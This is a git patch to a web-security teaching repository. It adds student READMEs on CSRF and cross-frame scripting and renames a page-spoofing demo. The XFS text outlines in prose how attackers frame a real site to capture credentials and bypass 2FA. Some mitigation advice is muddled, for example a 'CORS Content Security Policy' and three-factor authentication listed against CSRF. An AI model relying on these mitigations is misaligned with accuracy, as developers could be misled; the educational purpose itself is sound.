From 09252c5efcb558f7ca555fe7baa5644ef0263ac6 Mon Sep 17 00:00:00 2001
From: Ben Jones <benpaddlejones@outlook.com>
Date: Thu, 3 Oct 2024 21:56:05 +1000
Subject: [PATCH] improve cyber docs

---
 .studentResources/CSRF/README.md              |  14 +++++
 .../Cross_Frame_Scripting/README.md           |  23 +++++++
 .../index.html                                |   2 +-
 .../Cross_Frame_Scripting_Tester/README.md    |   3 -
 .../images/favicon.png                        | Bin 15523 -> 0 bytes
 .studentResources/XXS_scripts/README.md       |  52 +++++++++++++++-
 .../data_sanatising/data_handler.py           |  39 ------------
 .../defensive_data_handling/README.md         |  25 ++++++++
 .../defensive_data_handling/data_handler.py   |  56 ++++++++++++++++++
 .../main.py                                   |   0
 .studentResources/safe_API/README.md          |   7 ++-
 11 files changed, 174 insertions(+), 47 deletions(-)
 create mode 100644 .studentResources/CSRF/README.md
 create mode 100644 .studentResources/Cross_Frame_Scripting/README.md
 rename .studentResources/{Cross_Frame_Scripting_Tester => Cross_Frame_Scripting}/index.html (90%)
 delete mode 100644 .studentResources/Cross_Frame_Scripting_Tester/README.md
 delete mode 100644 .studentResources/Cross_Frame_Scripting_Tester/images/favicon.png
 delete mode 100644 .studentResources/data_sanatising/data_handler.py
 create mode 100644 .studentResources/defensive_data_handling/README.md
 create mode 100644 .studentResources/defensive_data_handling/data_handler.py
 rename .studentResources/{data_sanatising => defensive_data_handling}/main.py (100%)

diff --git a/.studentResources/CSRF/README.md b/.studentResources/CSRF/README.md
new file mode 100644
index 0000000..ac4f20f
--- /dev/null
+++ b/.studentResources/CSRF/README.md
@@ -0,0 +1,14 @@
+# Cross-Site Request Forgery (CSRF)
+
+Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
+
+## How to secure against this attack
+
+- End user education.
+- Https encryption.
+- End user education.
+- Implement a CORS Content Security Policy (CSP).
+- Understand how the attack can be executed in the specific conext of the application and user then code review with specific senarios in mind.
+- Implement three-factor authentication (3FA) for administrative opperations.
+- Seperate production and development environments.
+- Whitelist firewall policies
diff --git a/.studentResources/Cross_Frame_Scripting/README.md b/.studentResources/Cross_Frame_Scripting/README.md
new file mode 100644
index 0000000..1d769e6
--- /dev/null
+++ b/.studentResources/Cross_Frame_Scripting/README.md
@@ -0,0 +1,23 @@
+# Cross Frame Scripting
+
+Cross-Frame Scripting (XFS) is an attack that combines malicious JavaScript with an iframe that loads a legitimate page in an effort to steal data from an unsuspecting user. This attack is usually only successful when combined with social engineering. An example would consist of an attacker convincing the user to navigate to a web page the attacker controls. The attacker’s page then loads malicious JavaScript and an HTML iframe pointing to a legitimate site. Once the user enters credentials into the legitimate site within the iframe, the malicious JavaScript steals the keystrokes.
+
+[This example](index.html) demonstrates how easy it is to spoof a webpage, in this case the Unsecure PWA.
+
+This attack is particularly effective on mobile devices as the browser hides most of the URL and the the spoofing page only requires some HTML and some inline JS. Which is why XFS coupled with SMS scams are some of the most sucessful.
+
+> [!NOTE]
+> Make sure the Unsecure PWA is being served at [http://127.0.0.1](http://127.0.0.1) before opening the demonstration page.  
+> `python main.py`
+
+As a more sophisticated attack the threat actors would:
+
+1. Serve both sites through a proxy circumventing any CORS CSP policy
+2. Have a back to base script that intercepts and transmits input data (username, password, credit card, etc) without the user knowing.
+3. Have a threat actor listening for inputs and interacting/handling the victim, which is how 2FA is often bypassed.
+
+How to secure against this attack
+
+1. End user education.
+2. Monitor http logs for unusually repeative GET calls.
+3. Implement Content Security Policy (CSP) preventing `<iframe>` loading.
diff --git a/.studentResources/Cross_Frame_Scripting_Tester/index.html b/.studentResources/Cross_Frame_Scripting/index.html
similarity index 90%
rename from .studentResources/Cross_Frame_Scripting_Tester/index.html
rename to .studentResources/Cross_Frame_Scripting/index.html
index 7546100..8df8429 100644
--- a/.studentResources/Cross_Frame_Scripting_Tester/index.html
+++ b/.studentResources/Cross_Frame_Scripting/index.html
@@ -6,7 +6,7 @@
         <meta http-equiv="X-UA-Compatible" content="ie=edge" />
 		<link rel="stylesheet" type="text/css" href="CSS/style.css">
         <title>The Unsecure PWA</title>
-        <link rel="icon" type="image/x-icon" href="images\favicon.png" />
+        <link rel="icon" type="image/x-icon" href="http:\\127.0.0.1\static\images\favicon.png" />
         <meta name="theme-color" content="#14E6DD" />
    </head>
 <body> 
diff --git a/.studentResources/Cross_Frame_Scripting_Tester/README.md b/.studentResources/Cross_Frame_Scripting_Tester/README.md
deleted file mode 100644
index c0b897c..0000000
--- a/.studentResources/Cross_Frame_Scripting_Tester/README.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# Cross_Frame_Scripting_Tester
-1. Change the source to your app's URL.
-2. Write any testing code in the script tage, usually you want to capture some form data before submission
\ No newline at end of file
diff --git a/.studentResources/Cross_Frame_Scripting_Tester/images/favicon.png b/.studentResources/Cross_Frame_Scripting_Tester/images/favicon.png
deleted file mode 100644
index 2e06eb3ca6776861396ef7a09702d08962036692..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 15523
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
